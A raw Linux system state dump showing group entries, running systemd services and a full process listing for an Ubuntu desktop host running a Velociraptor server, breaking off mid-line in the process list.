bluetooth:x:114: ssl-cert:x:115: uuidd:x:116: systemd-oom:x:117: tcpdump:x:118: avahi-autoipd:x:119: netdev:x:120: avahi:x:121: lpadmin:x:122:champuser rtkit:x:123: whoopsie:x:124: sssd:x:125: fwupd-refresh:x:126: nm-openvpn:x:127: scanner:x:128:saned saned:x:129: colord:x:130: geoclue:x:131: pulse:x:132: pulse-access:x:133: gdm:x:134: lxd:x:135:champuser champuser:x:1000: sambashare:x:136:champuser sudoadmin:x:1001: --------------------------------- services UNIT LOAD ACTIVE SUB DESCRIPTION accounts-daemon.service loaded active running Accounts Service acpid.service loaded active running ACPI event daemon apparmor.service loaded active exited Load AppArmor profiles apport.service loaded active exited LSB: automatic crash report generation auditd.service loaded active running Security Auditing Service avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack colord.service loaded active running Manage, Install and Generate Color Profiles console-setup.service loaded active exited Set console font and keymap cron.service loaded active running Regular background program processing daemon cups-browsed.service loaded active running Make remote CUPS printers available locally cups.service loaded active running CUPS Scheduler dbus.service loaded active running D-Bus System Message Bus gdm.service loaded active running GNOME Display Manager irqbalance.service loaded active running irqbalance daemon kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures keyboard-setup.service loaded active exited Set the console keyboard layout kmod-static-nodes.service loaded active exited Create List of Static Device Nodes ModemManager.service loaded active running Modem Manager networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd NetworkManager-wait-online.service loaded active exited Network Manager Wait Online NetworkManager.service loaded active running Network Manager openvpn.service loaded active exited OpenVPN service packagekit.service loaded active running PackageKit Daemon plymouth-quit-wait.service loaded active exited Hold until boot process finishes up plymouth-read-write.service loaded active exited Tell Plymouth To Write Out Runtime Data plymouth-start.service loaded active exited Show Plymouth Boot Screen podman-restart.service loaded active exited Podman Start All Containers With Restart Policy Set To Always polkit.service loaded active running Authorization Manager power-profiles-daemon.service loaded active running Power Profiles daemon rsyslog.service loaded active running System Logging Service rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service setvtrgb.service loaded active exited Set console scheme snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd snapd.seeded.service loaded active exited Wait until snapd is fully seeded snapd.service loaded active running Snap Daemon switcheroo-control.service loaded active running Switcheroo Control Proxy service systemd-binfmt.service loaded active exited Set Up Additional Binary Formats systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited File System Check on /dev/disk/by-uuid/4015-7165 systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage systemd-journald.service loaded active running Journal Service systemd-logind.service loaded active running User Login Management systemd-modules-load.service loaded active exited Load Kernel Modules systemd-oomd.service loaded active running Userspace Out-Of-Memory (OOM) Killer systemd-random-seed.service loaded active exited Load/Save Random Seed systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems systemd-resolved.service loaded active running Network Name Resolution systemd-sysctl.service loaded active exited Apply Kernel Variables systemd-sysusers.service loaded active exited Create System Users systemd-timesyncd.service loaded active running Network Time Synchronization systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories systemd-udev-trigger.service loaded active exited Coldplug All udev Devices systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files systemd-update-utmp.service loaded active exited Record System Boot/Shutdown in UTMP systemd-user-sessions.service loaded active exited Permit User Sessions udisks2.service loaded active running Disk Manager ufw.service loaded active exited Uncomplicated firewall unattended-upgrades.service loaded active running Unattended Upgrades Shutdown upower.service loaded active running Daemon for power management [email protected] loaded active exited User Runtime Directory /run/user/1000 [email protected] loaded active running User Manager for UID 1000 velociraptor.service loaded active running Velociraprot linux amd64 wpa_supplicant.service loaded active running WPA supplicant LOAD = Reflects whether the unit definition was properly loaded. ACTIVE = The high-level unit activation state, i.e. generalization of SUB. SUB = The low-level unit activation state, values depend on unit type. 63 loaded units listed. Pass --all to see loaded but inactive units, too. To show all installed unit files use 'systemctl list-unit-files'. --------------------------------- List Processes USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 168036 12752 ? Ss 11:08 0:08 /sbin/init splash root 2 0.0 0.0 0 0 ? S 11:08 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 11:08 0:00 [pool_workqueue_release] root 4 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-rcu_g] root 5 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-rcu_p] root 6 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-slub_] root 7 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-netns] root 10 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/0:0H-events_highpri] root 12 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-mm_pe] root 13 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_kthread] root 14 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_rude_kthread] root 15 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_trace_kthread] root 16 0.0 0.0 0 0 ? S 11:08 0:00 [ksoftirqd/0] root 17 0.0 0.0 0 0 ? I 11:08 0:04 [rcu_preempt] root 18 0.0 0.0 0 0 ? S 11:08 0:00 [migration/0] root 19 0.0 0.0 0 0 ? S 11:08 0:00 [idle_inject/0] root 20 0.0 0.0 0 0 ? S 11:08 0:00 [cpuhp/0] root 21 0.0 0.0 0 0 ? S 11:08 0:00 [cpuhp/1] root 22 0.0 0.0 0 0 ? S 11:08 0:00 [idle_inject/1] root 23 0.0 0.0 0 0 ? S 11:08 0:00 [migration/1] root 24 0.0 0.0 0 0 ? S 11:08 0:00 [ksoftirqd/1] root 26 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/1:0H-events_highpri] root 29 0.0 0.0 0 0 ? S 11:08 0:00 [kdevtmpfs] root 30 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-inet_] root 31 0.6 0.0 0 0 ? S 11:08 3:21 [kauditd] root 32 0.0 0.0 0 0 ? S 11:08 0:00 [khungtaskd] root 33 0.0 0.0 0 0 ? S 11:08 0:00 [oom_reaper] root 35 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-write] root 36 0.0 0.0 0 0 ? S 11:08 0:06 [kcompactd0] root 38 0.0 0.0 0 0 ? SN 11:08 0:00 [ksmd] root 39 0.0 0.0 0 0 ? SN 11:08 0:00 [khugepaged] root 40 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kinte] root 41 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kbloc] root 42 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-blkcg] root 43 0.0 0.0 0 0 ? S 11:08 0:00 [irq/9-acpi] root 44 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-tpm_d] root 45 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ata_s] root 46 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-md] root 47 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-md_bi] root 48 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-edac-] root 49 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-devfr] root 50 0.0 0.0 0 0 ? S 11:08 0:00 [watchdogd] root 51 0.0 0.0 0 0 ? I< 11:08 0:11 [kworker/0:1H-kblockd] root 52 0.0 0.0 0 0 ? S 11:08 0:06 [kswapd0] root 53 0.0 0.0 0 0 ? S 11:08 0:00 [ecryptfs-kthread] root 55 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kthro] root 56 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-acpi_] root 57 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_0] root 58 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_] root 59 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_1] root 60 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_] root 61 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_2] root 62 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_] root 66 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-mld] root 67 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ipv6_] root 76 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kstrp] root 78 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u7:0] root 79 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u8:0] root 80 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u9:0] root 94 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-charg] root 113 0.0 0.0 0 0 ? I< 11:08 0:11 [kworker/1:1H-kblockd] root 146 0.0 0.0 0 0 ? I 11:08 0:12 [kworker/u4:1-ext4-rsv-conversion] root 181 0.1 0.0 0 0 ? S 11:08 0:38 [jbd2/sda3-8] root 182 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ext4-] root 221 0.1 3.3 469244 203208 ? S<s 11:09 0:50 /lib/systemd/systemd-journald root 253 0.0 0.1 26888 6608 ? Ss 11:09 0:00 /lib/systemd/systemd-udevd root 306 0.0 0.0 0 0 ? I< 11:09 0:00 [kworker/R-ttm] root 308 0.0 0.0 0 0 ? I< 11:09 0:00 [kworker/R-crypt] systemd+ 378 0.1 0.1 14836 6272 ? Ss 11:09 0:49 /lib/systemd/systemd-oomd systemd+ 381 0.0 0.1 26464 10096 ? Ss 11:09 0:01 /lib/systemd/systemd-resolved systemd+ 385 0.0 0.1 89388 6144 ? Ssl 11:09 0:00 /lib/systemd/systemd-timesyncd root 391 2.3 0.0 11872 2692 ? S<sl 11:09 12:34 /sbin/auditd root 424 0.0 0.0 0 0 ? S 11:09 0:00 [audit_prune_tree] root 487 0.0 0.1 240040 6968 ? Ssl 11:09 0:01 /usr/libexec/accounts-daemon root 488 0.0 0.0 2816 1920 ? Ss 11:09 0:00 /usr/sbin/acpid avahi 491 0.0 0.0 7632 3712 ? Ss 11:09 0:01 avahi-daemon: running [ubuntu-28.local] root 493 0.0 0.0 9496 2688 ? Ss 11:09 0:00 /usr/sbin/cron -f -P message+ 494 0.0 0.1 11120 6656 ? Ss 11:09 0:02 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 496 0.0 0.2 261108 14912 ? Ssl 11:09 0:04 /usr/sbin/NetworkManager --no-daemon root 502 0.0 0.0 82768 3328 ? Ssl 11:09 0:01 /usr/sbin/irqbalance --foreground root 506 0.0 0.2 41200 13824 ? Ss 11:09 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers root 508 0.0 0.1 243096 10256 ? Ssl 11:09 0:02 /usr/libexec/polkitd --no-debug root 509 0.0 0.0 240068 5888 ? Ssl 11:09 0:00 /usr/libexec/power-profiles-daemon syslog 511 0.0 0.0 222404 4480 ? Ssl 11:09 0:00 /usr/sbin/rsyslogd -n -iNONE root 515 0.0 0.3 1849620 23012 ? Ssl 11:09 0:06 /usr/lib/snapd/snapd root 517 0.0 0.0 236380 5760 ? Ssl 11:09 0:00 /usr/libexec/switcheroo-control root 522 0.0 0.1 15400 6648 ? Ss 11:09 0:00 /lib/systemd/systemd-logind root 525 0.0 0.1 393080 10072 ? Ssl 11:09 0:00 /usr/libexec/udisks2/udisksd root 528 0.0 0.0 16504 4352 ? Ss 11:09 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant avahi 551 0.0 0.0 7444 1408 ? S 11:09 0:00 avahi-daemon: chroot helper root 580 0.0 0.1 317972 7736 ? Ssl 11:09 0:00 /usr/sbin/ModemManager root 593 0.0 0.4 6166548 27960 ? Ssl 11:09 0:13 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v root 614 0.0 0.2 118192 15872 ? Ssl 11:09 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal root 641 0.0 0.1 241344 7808 ? Ssl 11:09 0:00 /usr/sbin/gdm3 root 645 0.0 0.1 73028 10752 ? Ss 11:09 0:00 /usr/sbin/cupsd -l root 691 0.0 0.1 172068 9856 ? Ssl 11:09 0:00 /usr/sbin/cups-browsed kernoops 707 0.0 0.0 13092 2456 ? Ss 11:09 0:00 /usr/sbin/kerneloops --test kernoops 712 0.0 0.0 13092 2324 ? Ss 11:09 0:00 /usr/sbin/kerneloops root 721 0.2 0.8 6168788 53052 ? Sl 11:09 1:25 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v rtkit 745 0.0 0.0 154004 3328 ? SNsl 11:09 0:00 /usr/libexec/rtkit-daemon root 968 0.0 0.1 242228 7296 ? Ssl 11:09 0:00 /usr/libexec/upowerd root 974 0.0 0.2 298380 15420 ? Ssl 11:09 0:00 /usr/libexec/packagekitd colord 1109 0.0 0.1 245376 10104 ? Ssl 11:09 0:00 /usr/libexec/colord root 1169 0.0 0.1 391920 10548 ? Sl 11:09 0:00 gdm-session-worker [pam/gdm-password] champus+ 1173 0.0 0.1 17984 10240 ? Ss 11:09 0:02 /lib/systemd/systemd --user champus+ 1174 0.0 0.0 169964 4316 ? S 11:09 0:00 (sd-pam) champus+ 1180 0.0 0.0 39568 4480 ? S<sl 11:09 0:00 /usr/bin/pipewire champus+ 1181 0.0 0.0 23456 4480 ? Ssl 11:09 0:00 /usr/bin/pipewire-media-session champus+ 1182 0.0 0.2 2132512 16868 ? S<sl 11:09 0:00 /usr/bin/pulseaudio --daemonize=no --log-target=journal champus+ 1193 0.0 0.1 240892 6428 ? Sl 11:09 0:00 /usr/bin/gnome-keyring-daemon --daemonize --login champus+ 1201 0.0 0.0 162432 5504 tty2 Ssl+ 11:09 0:00 /usr/libexec/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --session=ubuntu champus+ 1203 0.2 1.5 656076 94788 tty2 Sl+ 11:09 1:22 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -nolisten tcp -background none -noreset -keeptty -novtswitch -verbose 3 champus+ 1214 0.0 0.1 10320 6528 ? Ss 11:09 0:02 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only champus+ 1215 0.0 0.1 612836 6784 ? Ssl 11:09 0:00 /usr/libexec/xdg-document-portal champus+ 1218 0.0 0.0 236156 5504 ? Ssl 11:09 0:00 /usr/libexec/xdg-permission-store root 1224 0.0 0.0 2796 1792 ? Ss 11:09 0:00 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc champus+ 1252 0.0 0.2 223044 12544 tty2 Sl+ 11:09 0:00 /usr/libexec/gnome-session-binary --session=ubuntu champus+ 1341 0.0 0.1 309728 7296 ? Ssl 11:09 0:00 /usr/libexec/at-spi-bus-launcher champus+ 1347 0.0 0.0 8564 4352 ? S 11:09 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus_1 champus+ 1390 0.0 0.0 91912 4736 ? Ssl 11:09 0:00 /usr/libexec/gnome-session-ctl --monitor champus+ 1406 0.0 0.1 240648 6656 ? Ssl 11:09 0:00 /usr/libexec/gvfsd champus+ 1418 0.0 0.0 380896 5888 ? Sl 11:09 0:00 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f champus+ 1423 0.0 0.2 519128 12672 ? Ssl 11:09 0:00 /usr/libexec/gnome-session-binary --systemd-service --session=ubuntu champus+ 1468 1.4 4.7 4242500 286388 ? Ssl 11:09 7:35 /usr/bin/gnome-shell champus+ 1516 0.0 0.2 583040 17024 ? Sl 11:09 0:00 /usr/libexec/gnome-shell-calendar-server champus+ 1522 0.0 0.3 1072140 21504 ? Ssl 11:09 0:00 /usr/libexec/evolution-source-registry champus+ 1530 0.0 0.4 597216 27264 ? Sl 11:09 0:00 /usr/libexec/goa-daemon champus+ 1533 0.0 0.4 840468 24960 ? Ssl 11:09 0:00 /usr/libexec/evolution-calendar-factory champus+ 1542 0.0 0.1 338404 11136 ? Sl 11:09 0:00 /usr/libexec/goa-identity-service champus+ 1543 0.0 0.1 315892 9216 ? Ssl 11:09 0:00 /usr/libexec/gvfs-udisks2-volume-monitor champus+ 1553 0.0 0.1 315212 6784 ? Ssl 11:09 0:02 /usr/libexec/gvfs-afc-volume-monitor champus+ 1561 0.0 0.0 236460 5760 ? Ssl 11:09 0:00 /usr/libexec/gvfs-mtp-volume-monitor champus+ 1563 0.0 0.0 156940 5376 ? Ssl 11:09 0:00 /usr/libexec/dconf-service champus+ 1572 0.0 0.3 672364 23680 ? Ssl 11:09 0:00 /usr/libexec/evolution-addressbook-factory champus+ 1573 0.0 0.0 236636 6016 ? Ssl 11:09 0:00 /usr/libexec/gvfs-goa-volume-monitor champus+ 1577 0.0 0.1 237416 6144 ? Ssl 11:09 0:00 /usr/libexec/gvfs-gphoto2-volume-monitor champus+ 1594 0.0 0.1 314868 7680 ? Sl 11:09 0:00 /usr/libexec/gvfsd-trash --spawner :1.19 /org/gtk/gvfs/exec_spaw/0 champus+ 1603 0.0 0.3 2599500 21508 ? Sl 11:09 0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.Shell.Notifications champus+ 1606 0.0 0.1 162756 7040 ? Sl 11:09 0:00 /usr/libexec/at-spi2-registryd --use-gnome-session champus+ 1618 0.0 0.0 2892 1664 ? Ss 11:09 0:00 sh -c /usr/bin/ibus-daemon --panel disable $([ "$XDG_SESSION_TYPE" = "x11" ] && echo "--xim") champus+ 1619 0.0 0.0 310392 5760 ? Ssl 11:09 0:00 /usr/libexec/gsd-a11y-settings champus+ 1622 0.0 0.1 315500 8484 ? Sl 11:09 0:19 /usr/bin/ibus-daemon --panel disable --xim champus+ 1624 0.0 0.3 537204 19428 ? Ssl 11:09 0:00 /usr/libexec/gsd-color champus+ 1630 0.0 0.1 375436 11520 ? Ssl 11:09 0:00 /usr/libexec/gsd-datetime champus+ 1633 0.0 0.1 312080 7040 ? Ssl 11:09 0:01 /usr/libexec/gsd-housekeeping champus+ 1634 0.0 0.2 341424 16108 ? Ssl 11:09 0:00 /usr/libexec/gsd-keyboard champus+ 1638 0.0 0.3 717624 19908 ? Ssl 11:09 0:00 /usr/libexec/gsd-media-keys champus+ 1640 0.0 0.3 525040 19320 ? Ssl 11:09 0:00 /usr/libexec/gsd-power champus+ 1642 0.0 0.1 249872 9344 ? Ssl 11:09 0:00 /usr/libexec/gsd-print-notifications champus+ 1643 0.0 0.1 232272 6784 ? Sl 11:09 0:00 /usr/libexec/gsd-disk-utility-notify champus+ 1644 0.0 0.0 457856 5888 ? Ssl 11:09 0:00 /usr/libexec/gsd-rfkill champus+ 1646 0.0 0.0 236292 5504 ? Ssl 11:09 0:00 /usr/libexec/gsd-screensaver-proxy champus+ 1649 0.0 0.1 465780 8192 ? Ssl 11:09 0:00 /usr/libexec/gsd-sharing champus+ 1654 0.0 0.1 312272 6656 ? Ssl 11:09 0:00 /usr/libexec/gsd-smartcard champus+ 1657 0.0 0.8 762828 52624 ? Sl 11:09 0:00 /usr/libexec/evolution-data-server/evolution-alarm-notify champus+ 1661 0.0 0.1 319312 7808 ? Ssl 11:09 0:00 /usr/libexec/gsd-sound champus+ 1665 0.0 0.2 268020 15892 ? Ssl 11:09 0:00 /usr/libexec/gsd-wacom champus+ 1674 0.0 0.2 343292 18172 ? Ssl 11:09 0:00 /usr/libexec/gsd-xsettings champus+ 1693 0.0 0.1 237312 6272 ? Sl 11:09 0:00 /usr/libexec/ibus-dconf champus+ 1695 0.0 0.3 272488 21236 ? Sl 11:09 0:04 /usr/libexec/ibus-extension-gtk3 champus+ 1701 0.0 0.3 194160 20792 ? Sl 11:09 0:00 /usr/libexec/ibus-x11 --kill-daemon champus+ 1706 0.0 0.1 237264 6400 ? Sl 11:09 0:00 /usr/libexec/ibus-portal champus+ 1723 0.0 0.2 342364 13184 ? Sl 11:09 0:00 /usr/libexec/gsd-printer champus+ 1733 0.0 0.0 39136 4224 ? Ss 11:09 0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration champus+ 1745 0.0 0.1 623772 10496 ? Ssl 11:09 0:01 /usr/libexec/xdg-desktop-portal champus+ 1765 0.0 0.8 1395884 54488 ? Ssl 11:09 0:02 /usr/libexec/xdg-desktop-portal-gnome champus+ 1851 0.0 0.4 2534008 25116 ? Sl 11:09 0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.ScreenSaver champus+ 1855 0.0 1.1 915040 68504 ? Sl 11:09 0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration champus+ 1874 0.0 0.1 163612 6784 ? Sl 11:09 0:06 /usr/libexec/ibus-engine-simple champus+ 1875 0.0 0.4 719576 30220 ? SNsl 11:09 0:02 /usr/libexec/tracker-miner-fs-3 champus+ 1926 0.0 0.2 342028 17920 ? Ssl 11:09 0:00 /usr/libexec/xdg-desktop-portal-gtk champus+ 1962 0.0 0.0 163048 5760 ? Ssl 11:09 0:00 /usr/libexec/gvfsd-metadata champus+ 1997 0.0 0.5 537936 33792 ? Sl 11:10 0:02 update-notifier champus+ 3887 0.0 0.0 41316 2688 ? S 11:16 0:00 podman champus+ 9538 0.0 1.0 1203740 62444 ? Sl 11:40 0:05 /usr/bin/nautilus --gapplication-service champus+ 9568 3.6 11.7 12402388 715020 ? Sl 11:42 18:06 /snap/firefox/7177/usr/lib/firefox/firefox champus+ 9638 0.0 0.0 21072 1696 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/crashhelper 9568 9 /tmp/ 11 champus+ 9701 0.0 0.4 299784 24576 ? S 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -ipcHandle 0 -signalPipe 1 -initialChannelId {54ef713b-a611-4e84-9f06-df63f5debaf4} -parentPid 9568 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 1 forkserver champus+ 9704 0.0 0.5 314180 36012 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:35969 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {232c0fd9-eff3-428d-9663-2763ef6a6ffb} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 2 socket champus+ 9732 1.7 3.0 2547960 183704 ? Sl 11:42 8:36 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:36141 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {2f719dbf-acd1-40e7-9c1f-45b26d269367} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 3 tab champus+ 9743 0.0 0.6 447228 39212 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:36141 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {83a6878e-195a-47e0-aa3f-fe4a5dfe3b7b} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 4 rdd champus+ 9780 0.0 0.2 1765940 17792 ? Sl 11:42 0:01 /usr/bin/snap userd champus+ 9938 0.0 1.3 2465008 81980 ? Sl 11:42 0:01 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:45757 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0e618765-94ab-4adb-96ee-e57c09db7d36} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 5 tab champus+ 10235 0.0 0.7 451848 44592 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -sandboxingKind 0 -prefsHandle 0:46927 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {4c7ee706-7853-4c03-b832-7098687275bf} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 6 utility champus+ 10244 1.2 9.9 3222128 603536 ? Sl 11:42 6:10 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43481 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {22da36fa-b041-4214-bca0-96970a908d65} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 7 tab champus+ 10451 0.2 1.2 2454436 77580 ? Sl 11:42 1:08 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43670 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0846778f-6aeb-4339-8fc9-4ab5f998a29e} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 10 tab champus+ 10653 0.0 0.1 388688 7808 ? Sl 11:43 0:00 /usr/libexec/gvfsd-network --spawner :1.19 /org/gtk/gvfs/exec_spaw/1 champus+ 10667 0.0 0.1 316828 7808 ? Sl 11:43 0:00 /usr/libexec/gvfsd-dnssd --spawner :1.19 /org/gtk/gvfs/exec_spaw/3 champus+ 10741 0.0 1.0 2428568 65204 ? Sl 11:47 0:27 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {7824f062-f181-48fd-85a5-9646d4287f73} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 14 tab champus+ 10748 0.0 1.0 2428568 65296 ? Sl 11:47 0:27 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {31607e45-8b35-41da-9de7-799bfb0700ea} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 15 tab champus+ 10754 0.0 1.0 2428568 65088 ? Sl 11:47 0:27 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {3a17b899-5005-4e4a-82f2-292b77770c09} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 16 tab root 10934 0.0 0.0 0 0 ? I 11:50 0:04 [kworker/1:1-events] root 23306 0.0 0.0 0 0 ? I 16:23 0:00 [kworker/u4:2] root 24156 0.0 0.0 0 0 ? I 16:53 0:01 [kworker/0:1-events] root 24945 0.0 0.0 0 0 ? I 18:38 0:00 [kworker/u5:1-events_power_efficient] root 24992 0.0 0.0 0 0 ? I 18:45 0:00 [kworker/u6:3-events_unbound] root 25287 0.0 0.0 0 0 ? I 19:35 0:00 [kworker/u6:1-flush-8:0] root 25479 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u6:2-events_unbound] root 25485 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u5:0-events_unbound] champus+ 25558 0.3 1.0 3059024 65360 ? Sl 19:48 0:02 gjs /usr/share/gnome-shell/extensions/[email protected]/ding.js -E -P /usr/share/gnome-shell/extensions/[email protected] -M 0 -D 0:0:1280:800:1:27:0:0:0:0 champus+ 25620 0.0 0.3 35940 18688 ? S 19:49 0:00 /usr/bin/python3 /usr/bin/gnome-terminal --wait champus+ 25621 0.0 0.4 307540 27136 ? Sl 19:49 0:00 /usr/bin/gnome-terminal.real --wait champus+ 25624 0.6 0.7 890588 48360 ? Ssl 19:49 0:04 /usr/libexec/gnome-terminal-server champus+ 25647 0.0 0.0 11268 5504 pts/0 Ss 19:49 0:00 bash root 25715 